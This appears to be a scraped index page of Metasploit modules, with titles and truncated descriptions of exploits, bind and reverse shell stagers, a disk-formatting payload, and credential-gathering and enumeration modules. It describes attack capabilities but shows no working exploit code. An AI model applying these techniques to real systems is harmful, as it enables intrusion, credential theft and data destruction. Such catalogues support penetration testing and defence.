Windows Command Shell, Hidden Bind Ipknock TCP Stager

Spawn a piped command shell staged. Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method you can spoof it with tools like hping. After that you could get your shellcode from any IP. The socket will appear as...

Lexmark MarkVision Enterprise Arbitrary File Upload

This module exploits a code execution flaw in Lexmark MarkVision Enterprise before version 2.1. A directory traversal vulnerability in the GfdFileUploadServlet servlet allows an unauthenticated attacker to upload arbitrary files, including arbitrary JSP code. This module has been tested...

ProjectSend Arbitrary File Upload

This module exploits a file upload vulnerability in ProjectSend revisions 100 to 561. The 'process-upload.php' file allows unauthenticated users to upload PHP files resulting in remote code execution as the web server user. This module requires Metasploit: https://metasploit.com/download Current...

MS14-068 Microsoft Kerberos Checksum Validation Vulnerability

This module exploits a vulnerability in the Microsoft Kerberos implementation. The problem exists in the verification of the Privilege Attribute Certificate PAC from a Kerberos TGS request, where a domain user may forge a PAC with arbitrary privileges, including Domain Administrator. This module...

Windows Upload/Execute, Hidden Bind TCP Stager

Uploads an executable and runs it staged. Listen for a connection from a hidden port and spawn a command shell to the allowed host. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize =...

Windows Inject DLL, Hidden Bind TCP Stager

Inject a custom DLL into the exploited process. Listen for a connection from a hidden port and spawn a command shell to the allowed host. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule...

Windows Meterpreter (Reflective Injection), Hidden Bind TCP Stager

Inject the Meterpreter server DLL via the Reflective Dll Injection payload staged. Requires Windows XP SP2 or newer. Listen for a connection from a hidden port and spawn a command shell to the allowed host. This module requires Metasploit: https://metasploit.com/download Current source:...

Windows Meterpreter (skape/jt Injection), Hidden Bind TCP Stager

Inject the meterpreter server DLL staged. Listen for a connection from a hidden port and spawn a command shell to the allowed host. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize =...

Reflective DLL Injection, Hidden Bind TCP Stager

Inject a DLL via a reflective loader. Listen for a connection from a hidden port and spawn a command shell to the allowed host. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 343...

Windows Command Shell, Hidden Bind TCP Stager

Spawn a piped command shell staged. Listen for a connection from a hidden port and spawn a command shell to the allowed host. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 343...

VNC Server (Reflective Injection), Hidden Bind TCP Stager

Inject a VNC Dll via a reflective loader staged. Listen for a connection from a hidden port and spawn a command shell to the allowed host. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule...

i-FTP Schedule Buffer Overflow

This module exploits a stack-based buffer overflow vulnerability in i-Ftp v2.20, caused by a long time value set for scheduled download. By persuading the victim to place a specially-crafted Schedule.xml file in the i-FTP folder, a remote attacker could execute arbitrary code on the system or cau...

BulletProof FTP Client BPS Buffer Overflow

This module exploits a stack-based buffer overflow vulnerability in BulletProof FTP Client 2010, caused by an overly long hostname. By persuading the victim to open a specially-crafted .BPS file, a remote attacker could execute arbitrary code on the system or cause the application to crash. This...

Allegro Software RomPager 'Misfortune Cookie' (CVE-2014-9222) Scanner

This module scans for HTTP servers that appear to be vulnerable to the 'Misfortune Cookie' vulnerability which affects Allegro Software Rompager versions before 4.34 and can allow attackers to authenticate to the HTTP service as an administrator without providing valid credentials. This module...

Windows Gather Active Directory Users

This module will enumerate user accounts in the default Active Domain AD directory and stores them in the database. If GROUPMEMBER is set to the DN of a group, this will list the members of that group by performing a recursive/nested search i.e. it will list users who are members of groups that a...

BMC TrackIt! Unauthenticated Arbitrary User Password Change

This module exploits a flaw in the password reset mechanism in BMC TrackIt! 11.3 and possibly prior versions. If the password reset service is configured to use a domain administrator which is the recommended configuration, then domain credentials can be reset such as domain Administrator. This...

Kippo SSH Honeypot Detector

This module will detect if an SSH server is running a Kippo honeypot. This is done by issuing unexpected data to the SSH service and checking the response returned for two particular non-standard error messages. This module requires Metasploit: https://metasploit.com/download Current source:...

Tuleap PHP Unserialize Code Execution

This module exploits a PHP object injection vulnerability in Tuleap 'Tuleap PHP Unserialize Code Execution', 'Description' = %q This module exploits a PHP object injection vulnerability in Tuleap = 7.6-4 which could be abused to allow authenticated users to execute arbitrary code with the...

JBoss JMX Console DeploymentFileRepository WAR Upload and Deployment

This module uses the DeploymentFileRepository class in the JBoss Application Server to deploy a JSP file which then deploys an arbitrary WAR file. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule...

ActualAnalyzer 'ant' Cookie Command Execution

This module exploits a command execution vulnerability in ActualAnalyzer version 2.81 and prior. The 'aa.php' file allows unauthenticated users to execute arbitrary commands in the 'ant' cookie. This module requires Metasploit: https://metasploit.com/download Current source:...

Wordpress Download Manager (download-manager) Unauthenticated File Upload

The WordPress download-manager plugin contains multiple unauthenticated file upload vulnerabilities which were fixed in version 2.7.5. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Wordpress...

Powershell Remoting Remote Command Execution

This module uses Powershell Remoting TCP 47001 to inject payloads on target machines. If RHOSTS are specified, it will try to resolve the IPs to hostnames, otherwise use a HOSTFILE to supply a list of known hostnames. This module requires Metasploit: https://metasploit.com/download Current source...

Arris VAP2500 tools_command.php Command Execution

Arris VAP2500 access points are vulnerable to OS command injection in the web management portal via the toolscommand.php page. Though authentication is required to access this page, it is trivially bypassed by setting the value of a cookie to an md5 hash of a valid username. This module requires...

Android 'Towelroot' Futex Requeue Kernel Exploit

This module exploits a bug in futexrequeue in the Linux kernel, using similar techniques employed by the towelroot exploit. Any Android device with a kernel built before June 2014 is likely to be vulnerable. This module requires Metasploit: https://metasploit.com/download Current source:...

WildFly Directory Traversal

This module exploits a directory traversal vulnerability found in the WildFly 8.1.0.Final web server running on port 8080, named JBoss Undertow. The vulnerability only affects to Windows systems. This module requires Metasploit: https://metasploit.com/download Current source:...

ManageEngine NetFlow Analyzer Arbitrary File Download

This module exploits an arbitrary file download vulnerability in CSVServlet on ManageEngine NetFlow Analyzer. This module has been tested on both Windows and Linux with versions 8.6 to 10.2. Note that when typing Windows paths, you must escape the backslash with a backslash. This module requires...

Windows Drive Formatter

This payload formats all mounted disks in Windows aka ShellcodeOfDeath. After formatting, this payload sets the volume label to the string specified in the VOLUMELABEL option. If the code is unable to access a drive for any reason, it skips the drive and proceeds to the next volume. This module...

Pandora FMS Default Credential / SQLi Remote Code Execution

This module attempts to exploit multiple issues in order to gain remote code execution under Pandora FMS version 'Pandora FMS Default Credential / SQLi Remote Code Execution', 'Description' = %q This module attempts to exploit multiple issues in order to gain remote code execution under Pandora F...

Microsoft SQL Server SQLi SUSER_SNAME Windows Domain Account Enumeration

This module can be used to bruteforce RIDs associated with the domain of the SQL Server using the SUSERSNAME function via Error Based SQL injection. This is similar to the smblookupsid module, but executed through SQL Server queries as any user with the PUBLIC role everyone. Information that can ...

Mac OS X IOKit Keyboard Driver Root Privilege Escalation

A heap overflow in IOHIKeyboardMapper::parseKeyMapping allows kernel memory corruption in Mac OS X before 10.10. By abusing a bug in the IORegistry, kernel pointers can also be leaked, allowing a full kASLR bypass. Tested on Mavericks 10.9.5, and should work on previous versions. The issue was...

Windows Active Directory Wordlist Builder

This module will gather information from the default Active Domain AD directory and use these words to seed a wordlist. By default it enumerates user accounts to build the wordlist. This module requires Metasploit: https://metasploit.com/download Current source:...

Microsoft SQL Server SUSER_SNAME Windows Domain Account Enumeration

This module can be used to bruteforce RIDs associated with the domain of the SQL Server using the SUSERSNAME function. This is similar to the smblookupsid module, but executed through SQL Server queries as any user with the PUBLIC role everyone. Information that can be enumerated includes Windows...

MS14-064 Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution

This module exploits the Windows OLE Automation array vulnerability, CVE-2014-6332. The vulnerability is known to affect Internet Explorer 3.0 until version 11 within Windows 95 up to Windows 10, and no patch for Windows XP. However, this exploit will only target Windows XP and Windows 7 box due ...

Gather Kademlia Server Information

This module uses the Kademlia BOOTSTRAP and PING messages to identify and extract information from Kademlia speaking UDP endpoints, typically belonging to eMule/eDonkey/BitTorrent servers or other P2P applications. This module requires Metasploit: https://metasploit.com/download Current source:...

SMTP NTLM Domain Extraction

Extract the Windows domain name from an SMTP NTLM challenge. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'SMTP NTLM Domain Extraction', 'Description' = 'Extract the Windows domain name from ...

Hikvision DVR RTSP Request Remote Code Execution

This module exploits a buffer overflow in the RTSP request parsing code of Hikvision DVR appliances. The Hikvision DVR devices record video feeds of surveillance cameras and offer remote administration and playback of recorded footage. The vulnerability is present in several models / firmware...

Send Cisco Discovery Protocol (CDP) Packets

This module sends Cisco Discovery Protocol CDP packets. Note that any responses to the CDP packets broadcast from this module will need to be analyzed with an external packet analysis tool, such as tcpdump or Wireshark in order to learn more about the Cisco switch and router environment. This...

Cisco DLSw Information Disclosure Scanner

This module implements the DLSw information disclosure retrieval. There is a bug in Cisco's DLSw implementation affecting 12.x and 15.x trains that allows an unauthenticated remote attacker to retrieve the partial contents of packets traversing a Cisco router with DLSw configured and active. This...

Windows Gather Outlook Email Messages

This module allows reading and searching email messages from the local Outlook installation using PowerShell. Please note that this module is manipulating the victims keyboard/mouse. If a victim is active on the target system, he may notice the activities of this module. Tested on Windows 8.1 x64...

UNIX Gather Remmina Credentials

Post module to obtain credentials saved for RDP and VNC from Remmina's configuration files. These are encrypted with 3DES using a 256-bit key generated by Remmina which is by design stored in relatively plain text in a file that must be properly protected. This module requires Metasploit:...

Python Meterpreter, Python Reverse HTTP Stager

Run a meterpreter server in Python compatible with 2.5-2.7 & 3.1+. Tunnel communication over HTTP This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = :dynamic include...

Java RMI Server Insecure Default Configuration Java Code Execution

This module takes advantage of the default configuration of the RMI Registry and RMI Activation services, which allow loading classes from any remote HTTP URL. As it invokes a method in the RMI Distributed Garbage Collector which is available via every RMI endpoint, it can be used against both...

MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python

This module exploits a vulnerability found in Windows Object Linking and Embedding OLE allowing arbitrary code execution, bypassing the patch MS14-060, for the vulnerability publicly known as "Sandworm", on systems with Python for Windows installed. Windows Vista SP2 all the way to Windows 8,...

Gather Quake Server Information

This module uses the getstatus or getinfo request to obtain information from a Quakeserver. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Gather Quake Server Information', 'Description' = %q...

Windows Outbound-Filtering Rules

This module makes some kind of TCP traceroute to get outbound-filtering rules. It will try to make a TCP connection to a certain public IP address this IP does not need to be under your control using different TTL incremental values. This way if you get an answer ICMP TTL time exceeded packet fro...

Samsung Galaxy KNOX Android Browser RCE

A vulnerability exists in the KNOX security component of the Samsung Galaxy firmware that allows a remote webpage to install an APK with arbitrary permissions by abusing the 'smdm://' protocol handler registered by the KNOX component. The vulnerability has been confirmed in the Samsung Galaxy S4,...

Microsoft SQL Server SQLi Escalate Execute AS

This module can be used escalate privileges if the IMPERSONATION privilege has been assigned to the user via error based SQL injection. In most cases, this results in additional data access, but in some cases it can be used to gain sysadmin privileges. The syntax for injection URLs is:...

MS14-064 Microsoft Windows OLE Package Manager Code Execution

This module exploits a vulnerability found in Windows Object Linking and Embedding OLE allowing arbitrary code execution, publicly exploited in the wild as MS14-060 patch bypass. The Microsoft update tried to fix the vulnerability publicly known as "Sandworm". Platforms such as Windows Vista SP2...

SSH Public Key Acceptance Scanner

This module can determine what public keys are configured for key-based authentication across a range of machines, users, and sets of known keys. The SSH protocol indicates whether a particular key is accepted prior to the client performing the actual signed authentication request. To use this...

SSH Username Enumeration

This module uses a malformed packet or timing attack to enumerate users on an OpenSSH server. The default action sends a malformed corrupted SSHMSGUSERAUTHREQUEST packet using public key authentication must be enabled to enumerate users. On some versions of OpenSSH under some configurations,...